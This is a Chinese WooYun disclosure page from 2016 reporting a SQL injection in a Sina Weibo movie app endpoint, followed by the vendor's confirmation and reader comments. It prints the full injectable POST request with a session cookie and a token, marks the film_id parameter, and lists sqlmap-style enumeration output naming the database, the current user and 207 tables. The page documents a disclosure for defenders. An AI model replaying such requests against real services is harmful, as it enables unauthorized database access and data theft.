当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212734

漏洞标题:新浪微博另一处SQL注入漏洞

相关厂商:新浪微博

漏洞作者: 路人甲

提交时间:2016-05-25 15:54

修复时间:2016-07-10 17:50

公开时间:2016-07-10 17:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-25: 细节已通知厂商并且等待厂商处理中
2016-05-26: 厂商已经确认,细节仅向厂商公开
2016-06-05: 细节向核心白帽子及相关领域专家公开
2016-06-15: 细节向普通白帽子公开
2016-06-25: 细节向实习白帽子公开
2016-07-10: 细节向公众公开

简要描述:

滴,穴深卡。周芷若已哭晕在厕所。

详细说明:

POST http://ting.weibo.com/movieapp/dialogue/show HTTP/1.1
Host: ting.weibo.com
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Cookie: TING-G0-YF=61cb3ab25b54439455665d34a539fe7d; ua=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.__iPhone 6__os9.3.1__1.4.0
User-Agent: WeiboMovie/1.4.0 (iPhone; iOS 9.3.1; Scale/2.00)
Accept-Language: zh-Hans-US;q=1, en-US;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 231
action=dialogue%2Fshow&aid=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.&d_n=iPhone%206&film_id=178868*&from=8614093010&ip=100.77.76.179&os_n=iOS&os_v=9.3.1&token=2.00ddC5ZDcX6kGDfeab6c3adc0VbshD&uid=3271300273&v=1.4.0&wm=44995


参数film_id

漏洞证明:

back-end DBMS: MySQL 5
current user: 'musiclib_r@10.75.%'
current database: 'musiclib'

back-end DBMS: MySQL 5
Database: musiclib
[207 tables]
+---------------------------------------+
| artist_match_name |
| cinema_area |
| cinema_baseinfo |
| cinema_screenings |
| cinema_tag |
| cinema_tag_mapcheck |
| firehose_info |
| mingxing_activity |
| mingxing_userflower |
| movie_action_count_score |
| movie_admin_page |
| movie_answers |
| movie_app_ad |
| movie_app_push_task |
| movie_app_realtime_push |
| movie_app_user |
| movie_app_user_token |
| movie_article |
| movie_artist |
| movie_box_office |
| movie_box_office_poll |
| movie_convert_callback |
| movie_coupon |
| movie_coupon_backup |
| movie_customize |
| movie_dialogue |
| movie_dialogue_pic |
| movie_dictionary |
| movie_emotion |
| movie_event_schedule |
| movie_film |
| movie_film_old |
| movie_film_promote |
| movie_filmtopic |
| movie_focus |
| movie_foreign_comment |
| movie_friendfeed |
| movie_game_rank |
| movie_game_seek_reply |
| movie_game_tools |
| movie_gewala_buy |
| movie_group_comment_report |
| movie_group_user |
| movie_hashdata |
| movie_hottopic |
| movie_nativebanner |
| movie_newsinfo |
| movie_object_relation |
| movie_pagepoll |
| movie_photo |
| movie_place_sale |
| movie_poll_daily_detail |
| movie_poll_detail |
| movie_poll_detail_hot |
| movie_poll_manul |
| movie_proterty |
| movie_push_map |
| movie_question_type |
| movie_questions |
| movie_relation |
| movie_relation_page |
| movie_tag_map |
| movie_ticket |
| movie_user_still |
| movie_video |
| movieapp_photo |
| open_api_info |
| open_api_tree |
| open_group |
| open_group_api_map |
| open_user |
| raw_album |
| raw_cinema_mapcheck |
| raw_map_check |
| raw_map_musician |
| raw_movie |
| raw_movie_artist_map |
| raw_movie_douban_pic |
| raw_movie_map |
| raw_mv |
| raw_mv_recommend |
| raw_podcast |
| raw_podcast_column |
| raw_podcast_map |
| raw_podcast_program |
| raw_singer |
| raw_song |
| raw_song_0 |
| raw_song_1 |
| raw_song_10 |
| raw_song_11 |
| raw_song_12 |
| raw_song_13 |
| raw_song_14 |
| raw_song_15 |
| raw_song_16 |
| raw_song_17 |
| raw_song_18 |
| raw_song_19 |
| raw_song_2 |
| raw_song_20 |
| raw_song_21 |
| raw_song_22 |
| raw_song_23 |
| raw_song_3 |
| raw_song_4 |
| raw_song_5 |
| raw_song_6 |
| raw_song_7 |
| raw_song_8 |
| raw_song_9 |
| raw_song_match |
| raw_source |
| res_ad |
| res_album |
| res_album_song_map |
| res_artist |
| res_artist_album_map |
| res_artist_song_map |
| res_asiapoll_blacklist |
| res_band |
| res_card_info |
| res_celebrity_songlist |
| res_chinasong_manul |
| res_comm_item |
| res_common_banner |
| res_copyright |
| res_copyright_album_map |
| res_copyright_artist_map |
| res_copyright_song_map |
| res_country |
| res_coupon_a |
| res_famous_songlist |
| res_feedback |
| res_film_bonus |
| res_film_coupon |
| res_focus |
| res_friendfeed |
| res_hashdata |
| res_hotweibo |
| res_hotweibo_new |
| res_interface_test |
| res_keyword_queue |
| res_language |
| res_language_album_map |
| res_language_artist_map |
| res_language_song_map |
| res_log |
| res_lyric |
| res_merge_log |
| res_music_style |
| res_musician_group |
| res_musician_page |
| res_musicstyle_album_map |
| res_musicstyle_artist_map |
| res_musicstyle_song_map |
| res_musictopic |
| res_nativebanner |
| res_object_creator_mblog |
| res_page_layout |
| res_page_render_map |
| res_page_rule_set |
| res_pagepoll |
| res_party_song |
| res_party_user_action |
| res_party_user_video |
| res_relation_store |
| res_reservation |
| res_right_card_map |
| res_right_card_model |
| res_s3_log |
| res_search_watch |
| res_share_text_map |
| res_song |
| res_song_audio |
| res_song_countinfo |
| res_song_ext |
| res_song_outter_00 |
| res_song_outter_01 |
| res_song_outter_02 |
| res_song_outter_03 |
| res_song_outter_04 |
| res_song_outter_05 |
| res_song_outter_06 |
| res_song_outter_07 |
| res_song_outter_08 |
| res_song_outter_09 |
| res_song_outter_0a |
| res_song_outter_0b |
| res_song_outter_0c |
| res_song_outter_0d |
| res_song_outter_0e |
| res_song_outter_0f |
| res_song_ringtone |
| res_songautopush_event |
| res_square_point_uid |
| res_timing_job |
| res_topic_monitor |
| res_uidlist |
| res_update_film |
| res_update_song |
| res_user |
| res_user_rate |
| res_usergroup |
| song_match_name |
| song_mv_map |
| xunlongjue_message |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

修复方案:

NULL

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-05-26 17:45

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-25 15:55 | zzR 认证白帽子 ( 核心白帽子 | Rank:1418 漏洞数:128 | 东方红**联盟欢迎你-0-)

    给你们这些人一个表情,自己去感受,要用心

  2. 2016-05-25 15:56 | Uknow ( 普通白帽子 | Rank:230 漏洞数:57 | 求团队!!!!)

    666666

  3. 2016-05-25 16:03 | 爱偷懒的98 ( 普通白帽子 | Rank:182 漏洞数:61 | 从前车马邮件都很慢,一生只够爱一个人。)

    洞主,我帮你把下一个标题想好了。新浪微博再再一处SQL注入漏洞

  4. 2016-05-25 17:29 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    滴,老司机卡!

  5. 2016-05-25 17:56 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    滴,老年卡~

  6. 2016-05-26 22:54 | Post ( 路人 | Rank:28 漏洞数:12 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    屌屌屌